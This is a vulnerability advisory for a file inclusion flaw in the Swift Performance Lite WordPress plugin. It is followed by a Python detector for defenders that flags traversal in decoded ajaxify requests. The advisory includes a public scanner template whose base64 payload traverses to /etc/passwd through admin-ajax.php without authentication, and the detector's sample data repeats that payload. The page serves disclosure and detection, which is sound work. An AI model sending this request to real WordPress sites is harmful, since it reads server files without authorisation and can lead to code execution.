CVE-2024-10516: Swift Performance Lite < 2.3.7.2 - Local PHP File Inclusion

Date: 2025-08-01 | Affected software: Swift Performance Lite | PoC: public

Vulnerability description

A vulnerability in Swift Performance Lite before version 2.3.7.2 allows unauthenticated attackers to perform local PHP file inclusion via the 'ajaxify' parameter. This can lead to arbitrary code execution on the server.

PoC code [public]

id: CVE-2024-10516

info:
  name: Swift Performance Lite < 2.3.7.2 - Local PHP File Inclusion
  author: ritikchaddha
  severity: high
  description: |
    A vulnerability in Swift Performance Lite before version 2.3.7.2 allows unauthenticated attackers to perform local PHP file inclusion via the 'ajaxify' parameter. This can lead to arbitrary code execution on the server.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-10516
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10516
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10516
    cwe-id: CWE-98
    epss-score: 0.76557
    epss-percentile: 0.98905
    cpe: cpe:2.3:a:swiftperformance:swift_performance_lite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: swiftperformance
    product: swift_performance_lite
    fofa-query: body="/wp-content/plugins/swift-performance-lite"
  tags: cve,cve2024,wp,wp-plugin,wordpress,swift-performance,lfi

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/2
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "/wp-content/plugins/swift-performance-lite"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=swift_performance_ajaxify&data=WyJ0ZW1wbGF0ZS1wYXJ0IiwibnVsbCIsIi4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QiXQ==

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ebc8dc7313ff5d86f742a01ed15512b15c90361267c854d797fbab52efb8d52b022071eb1e4cb90e8cf0a362bb361079a050e47fe556d2d50b2abc69d2caece73807:922c64590222798bb761d5b6d8e72950
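As an added defender-side example, not part of the original template or the PoC it references, the following Python inspects admin-ajax.php POST bodies (as a WAF, reverse proxy or request log would see them) for the shape of request the template above sends. The action name `swift_performance_ajaxify` and the base64-encoded JSON `data` parameter are taken from the template; the assumption that the decoded list carries a template path that must stay relative to the plugin directory is inferred from the payload's shape and is not documented on this page. The sample bodies are constructed; the first is the template's own payload.

```python
import base64
import binascii
import json
from urllib.parse import parse_qs

# Action name as seen in the PoC template above. Argument layout (a JSON list
# whose entries include a template path) is an assumption drawn from the payload.
SUSPECT_ACTION = "swift_performance_ajaxify"


def decode_ajaxify_data(data_b64):
    """Decode the base64 JSON carried in 'data'; return None if it is malformed.

    A literal '+' in a form body arrives as a space after URL decoding, so it is
    restored before base64 decoding.
    """
    try:
        raw = base64.b64decode(data_b64.replace(" ", "+"), validate=True)
        return json.loads(raw)
    except (binascii.Error, ValueError):
        return None


def is_traversal(value):
    """True if a path value escapes its directory: '..' segments, an absolute
    path, a stream wrapper (scheme://) or an embedded NUL byte.
    Backslashes are normalised so Windows-style payloads are caught too."""
    v = value.replace("\\", "/")
    if "\x00" in v or v.startswith("/") or "://" in v:
        return True
    return any(segment == ".." for segment in v.split("/"))


def _strings(obj):
    """Yield every string nested anywhere inside decoded JSON."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, list):
        for item in obj:
            yield from _strings(item)
    elif isinstance(obj, dict):
        for key, val in obj.items():
            yield from _strings(key)
            yield from _strings(val)


def inspect_body(body):
    """Classify one application/x-www-form-urlencoded admin-ajax.php body."""
    params = parse_qs(body, keep_blank_values=True)
    action = params.get("action", [""])[0]
    if action != SUSPECT_ACTION:
        return {"suspicious": False, "reason": "other action"}
    decoded = decode_ajaxify_data(params.get("data", [""])[0])
    if decoded is None:
        # Not the plugin's expected encoding; worth a look but not a proven attack.
        return {"suspicious": True, "reason": "malformed ajaxify data"}
    for value in _strings(decoded):
        if is_traversal(value):
            return {"suspicious": True,
                    "reason": "path traversal in ajaxify data",
                    "path": value}
    return {"suspicious": False, "reason": "relative template path"}


def scan_bodies(bodies):
    """Return (body, verdict) pairs for every suspicious body in the input."""
    return [(b, v) for b in bodies if (v := inspect_body(b))["suspicious"]]


# Constructed sample bodies. The first is the payload from the template above,
# which decodes to ["template-part","null","../../../../../etc/passwd"].
SAMPLE_BODIES = [
    "action=swift_performance_ajaxify&data="
    "WyJ0ZW1wbGF0ZS1wYXJ0IiwibnVsbCIsIi4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QiXQ==",
    # A benign-looking call with a plain relative template name (constructed).
    "action=swift_performance_ajaxify&data="
    + base64.b64encode(json.dumps(["template-part", "null", "header"]).encode()).decode(),
    # An unrelated admin-ajax action (constructed).
    "action=heartbeat&_nonce=abc123",
]

if __name__ == "__main__":
    for body, verdict in scan_bodies(SAMPLE_BODIES):
        print(verdict["reason"], "->", body[:60])
```

The check flags on the decoded content rather than on the base64 string, so re-encoding the same traversal with different padding, nesting or extra whitespace does not evade it; a WordPress host can apply the same decision in a WAF rule or in log review. Treating undecodable `data` as worth review rather than as a confirmed attack keeps false positives manageable.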